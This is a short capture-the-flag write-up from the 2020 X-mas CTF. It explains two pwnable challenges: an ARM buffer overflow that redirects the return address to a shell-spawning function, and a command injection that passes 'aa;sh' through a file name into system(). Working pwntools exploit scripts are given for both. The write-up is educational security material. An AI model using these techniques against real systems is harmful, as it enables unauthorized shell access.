2020 X-mas CTF

2020 X-mas CTF Write-up

Baby_Rudolph (pwnable)

vulnerability

There is Buffer Overflow in vuln function. It is triggered by calling read.

And Using get_arm function, we can get the sh. So it is easy bof. just overwrite retur address to get_arm.

We need ARM, because the binary is for ARM architecture. So They gave docker. but it didn’t work. I used qemu for constructing analysis environment.
/usr/bin/qemu-system-aarch64 -M virt -cpu cortex-a57 -m 128 -kernel ./kernel -initrd ./rootfs -nographic -serial mon:stdio -append console=ttyAMA0

exploit

from pwn import *
context.log_level = 'DEBUG'

p = remote('host7.dreamhack.games',17341)
get_arm = 0x400680
argv = 0x1225

payload = ''
payload += '\x90'*72
payload += p64(get_arm)
payload += p64(argv)

p.sendlineafter('ARM...!\N',payload)
p.interactive()

Oil_System (pwnable)

vulnerability

It opens the file with the name I entered. and also it uses System function when it opens the file.
(ex Syste(/home/~~))

When i entered the name, It called check_upper_lowerfunction. But it only check whether the first character is lowercase or not. It means the name can contain ; or | after first character. So we can use command injection. if i enter the name as A;/bin/sh, can get the sh.

exploit

from pwn import *
context.log_level = 'DEBUG'

p = process('./oil')

p.sendlineafter('> ','2')
p.sendlineafter('Name : ' , 'aa;sh')
p.sendlineafter('Code : ', '1 2 3')
p.sendlineafter('> ','3')
p.interactive()